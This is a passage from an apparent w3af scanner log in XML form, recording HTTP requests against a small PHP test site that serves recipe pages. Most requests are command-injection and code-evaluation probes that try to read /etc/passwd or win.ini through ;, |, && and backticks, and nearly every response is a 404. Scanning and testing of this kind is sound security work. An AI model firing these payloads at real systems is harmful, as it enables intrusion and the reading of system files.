h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="255">
                <http-request>
                    <status>GET http://10.12.68.43:31337/choucroute HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Choucroute Garnie&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;1/3 cup kosher salt, plus more for seasoning&lt;/li&gt;
        &lt;li&gt;2 tablespoons light brown sugar&lt;/li&gt;
        &lt;li&gt;3 pounds pork back ribs or baby back ribs, cut into 3 sections&lt;/li&gt;
        &lt;li&gt;6 pounds sauerkraut (in plastic bags), drained&lt;/li&gt;
        &lt;li&gt;1/4 cup duck or goose fat or peanut oil&lt;/li&gt;
        &lt;li&gt;1 large onion, coarsely chopped&lt;/li&gt;
        &lt;li&gt;4 large garlic cloves, coarsely chopped&lt;/li&gt;
        &lt;li&gt;20 juniper berries&lt;/li&gt;
        &lt;li&gt;3 large bay leaves&lt;/li&gt;
        &lt;li&gt;1/2 teaspoon caraway seeds&lt;/li&gt;
        &lt;li&gt;1 teaspoon freshly ground black pepper&lt;/li&gt;
        &lt;li&gt;3 cups chicken stock&lt;/li&gt;
        &lt;li&gt;1 1/2 cups Riesling or Pinot Gris&lt;/li&gt;
        &lt;li&gt;2 pounds Polish kielbasa, skinned and cut into 2-inch pieces&lt;/li&gt;
        &lt;li&gt;10 skinless hot dogs&lt;/li&gt;
        &lt;li&gt;One 2-pound piece of boneless boiled ham (3 to 4 inches wide), sliced 1/4 inch thick&lt;/li&gt;
        &lt;li&gt;2 pounds medium potatoes (about 10), peeled&lt;/li&gt;
        &lt;li&gt;Assorted mustards, for serving&lt;/li&gt;
    &lt;/ul&gt;

    &lt;a href='/choucroute'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="256">
                <http-request>
                    <status>GET http://10.12.68.43:31337/echo+str_repeat%28%27qblzb%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about echo+str_repeat%28%27qblzb%27%2C5%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='echo+str_repeat%28%27qblzb%27%2C5%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="258">
                <http-request>
                    <status>GET http://10.12.68.43:31337/print+%27qblzb%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27qblzb%27x5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27qblzb%27x5'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="260">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="262">
                <http-request>
                    <status>GET http://10.12.68.43:31337/print+%27qblzb%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27qblzb%27%2A5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27qblzb%27%2A5'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="263">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Response.Write%28new+String%28%22qblzb%22%2C5%29%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="584" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Response.Write%28new+String%28%22qblzb%22%2C5%29%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="264">
                <http-request>
                    <status>GET http://10.12.68.43:31337/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about /bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="266">
                <http-request>
                    <status>GET http://10.12.68.43:31337/type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="564" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="267">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="268">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="269">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60%2Fbin%2Fcat+%2Fetc%2Fpasswd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="270">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="271">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60/bin/cat+/etc/passwd%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60/bin/cat+/etc/passwd%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60/bin/cat+/etc/passwd%60'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="273">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fbin%2Fcat+%2Fetc%2Fpasswd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fbin%2Fcat+%2Fetc%2Fpasswd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="274">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="275">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="570" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%26%26type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="276">
                <http-request>
                    <status>GET http://10.12.68.43:31337/run+type+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="568" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/run+type+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="277">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B/bin/cat+/etc/passwd HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B/bin/cat+/etc/passwd has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B/bin/cat+/etc/passwd'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="278">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%27b%22c%27d%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%27b%22c%27d%22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%27b%22c%27d%22'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="279">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Btype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%3Btype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="280">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="567" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%7Ctype+%25SYSTEMROOT%25%5Cwin.ini&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="292">
                <http-request>
                    <status>GET http://10.12.68.43:31337/HK64uA3S HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about HK64uA3S has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='HK64uA3S'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="305">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cake HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Chocolate cake&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;225g/8oz plain flour&lt;/li&gt;
        &lt;li&gt;350g/12½oz caster sugar&lt;/li&gt;
        &lt;li&gt;85g/3oz cocoa powder&lt;/li&gt;
        &lt;li&gt;1½ tsp baking powder&lt;/li&gt;
        &lt;li&gt;1½ tsp bicarbonate of soda&lt;/li&gt;
        &lt;li&gt;2 free-range eggs&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz milk&lt;/li&gt;
        &lt;li&gt;125ml/4½fl oz vegetable oil&lt;/li&gt;
        &lt;li&gt;2 tsp vanilla extract&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz boiling water&lt;/li&gt;
    &lt;/ul&gt;
    &lt;a href='/cake'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="311">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
